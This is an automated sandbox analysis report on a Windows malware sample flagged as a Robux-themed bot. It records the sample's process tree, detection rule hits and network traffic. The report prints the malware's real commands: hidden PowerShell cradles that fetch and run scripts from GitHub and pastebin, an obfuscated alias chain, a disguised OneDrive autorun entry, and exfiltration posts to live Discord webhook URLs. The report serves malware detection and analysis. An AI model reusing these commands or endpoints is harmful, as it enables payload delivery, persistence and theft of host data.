Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OSLdZanXNc.exe

Overview

General Information

Sample name:OSLdZanXNc.exe
renamed because original name is a hash value
Original sample name:a40d9f817045b1192d6cfc6a2defd4289d0f8e67c1ad147a7e51d50be8448203.exe
Analysis ID:1534108
MD5:98ff253f6f854df7b7f6794a2761dbd1
SHA1:246ae6060c76a6751b6ba2d9ca0de18e298b5e26
SHA256:a40d9f817045b1192d6cfc6a2defd4289d0f8e67c1ad147a7e51d50be8448203
Tags:exeNeth3Nuser-JAMESWT_MHT
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • OSLdZanXNc.exe (PID: 7512 cmdline: "C:\Users\user\Desktop\OSLdZanXNc.exe" MD5: 98FF253F6F854DF7B7F6794A2761DBD1)
    • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7564 cmdline: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)} MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7736 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 8124 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • forfiles.exe (PID: 8068 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8148 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7328 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 6592 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 2696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2596 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7368 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7328INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x4d898:$b1: ::WriteAllBytes(
  • 0x912cf:$b1: ::WriteAllBytes(
  • 0x376d1:$s1: -join
  • 0x3e698:$s1: -join
  • 0x112b23:$s1: -join
  • 0x113283:$s1: -join
  • 0x3a1d:$s3: reverse
  • 0xda53:$s3: reverse
  • 0x59d2b:$s3: reverse
  • 0x609ad:$s3: reverse
  • 0x62840:$s3: reverse
  • 0x6d86f:$s3: reverse
  • 0x742b0:$s3: reverse
  • 0x7f0fd:$s3: reverse
  • 0x140fcd:$s3: reverse
  • 0x1412bb:$s3: reverse
  • 0x1419d5:$s3: reverse
  • 0x14218e:$s3: reverse
  • 0x1490cc:$s3: reverse
  • 0x1494e6:$s3: reverse
  • 0x14a06e:$s3: reverse

Other

SourceRuleDescriptionAuthorStrings
amsi64_7328.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process
amsi64_7368.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process

Sigma Signatures

System Summary

barindex
Sigma detected: PowerShell Download and Execution Cradles
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OSLdZanXNc.exe", ParentImage: C:\Users\user\Desktop\OSLdZanXNc.exe, ParentProcessId: 7512, ParentProcessName: OSLdZanXNc.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, ProcessId: 7564, ProcessName: powershell.exe
Sigma detected: Suspicious PowerShell Parameter Substring
Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OSLdZanXNc.exe", ParentImage: C:\Users\user\Desktop\OSLdZanXNc.exe, ParentProcessId: 7512, ParentProcessName: OSLdZanXNc.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, ProcessId: 7564, ProcessName: powershell.exe
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7736, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Sigma detected: PowerShell Web Download
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OSLdZanXNc.exe", ParentImage: C:\Users\user\Desktop\OSLdZanXNc.exe, ParentProcessId: 7512, ParentProcessName: OSLdZanXNc.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, ProcessId: 7564, ProcessName: powershell.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OSLdZanXNc.exe", ParentImage: C:\Users\user\Desktop\OSLdZanXNc.exe, ParentProcessId: 7512, ParentProcessName: OSLdZanXNc.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, ProcessId: 7564, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OSLdZanXNc.exe", ParentImage: C:\Users\user\Desktop\OSLdZanXNc.exe, ParentProcessId: 7512, ParentProcessName: OSLdZanXNc.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, ProcessId: 7564, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T16:01:34.007990+020028576591A Network Trojan was detected192.168.2.949943162.159.137.232443TCP
2024-10-15T16:01:42.173236+020028576591A Network Trojan was detected192.168.2.949984162.159.137.232443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T16:01:20.844371+020028576581A Network Trojan was detected192.168.2.949868162.159.137.232443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.1% probability
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.9:49763 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.9:49856 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.9:49869 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.9:49868 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.9:49905 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.9:49916 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.9:49943 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.9:49984 version: TLS 1.2
Source: OSLdZanXNc.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb2 source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E850070000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E850102000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\adminalt\Autodesk.AutoCAD.2023.x64.Portable\x64\Release\PePacker.pdb source: OSLdZanXNc.exe
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.Management.Automation.pdb!F source: powershell.exe, 0000000B.00000002.3244005640.000001E850102000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E850102000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbt source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000B.00000002.3244005640.000001E850070000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E850102000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbX$ source: powershell.exe, 0000000B.00000002.3244005640.000001E850070000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbIN source: powershell.exe, 0000000B.00000002.3244005640.000001E850102000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\adminalt\Autodesk.AutoCAD.2023.x64.Portable\x64\Release\PePacker.pdb) source: OSLdZanXNc.exe
Source: Binary string: \??\C:\Windows\mscorlib.pdb[ source: powershell.exe, 0000000B.00000002.3244005640.000001E850102000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb( source: powershell.exe, 0000000B.00000002.3244005640.000001E850070000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbn source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.9:49984 -> 162.159.137.232:443
Source: Network trafficSuricata IDS: 2857658 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Registration : 192.168.2.9:49868 -> 162.159.137.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.9:49943 -> 162.159.137.232:443
Connects to a pastebin service (likely for C&C)
Source: unknownDNS query: name: pastebin.com
Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox ViewIP Address: 162.159.137.232 162.159.137.232
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 215Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 296Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 296Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: pastebin.com
Source: global trafficDNS traffic detected: DNS query: discord.com
Source: unknownHTTP traffic detected: POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 215Connection: Keep-Alive
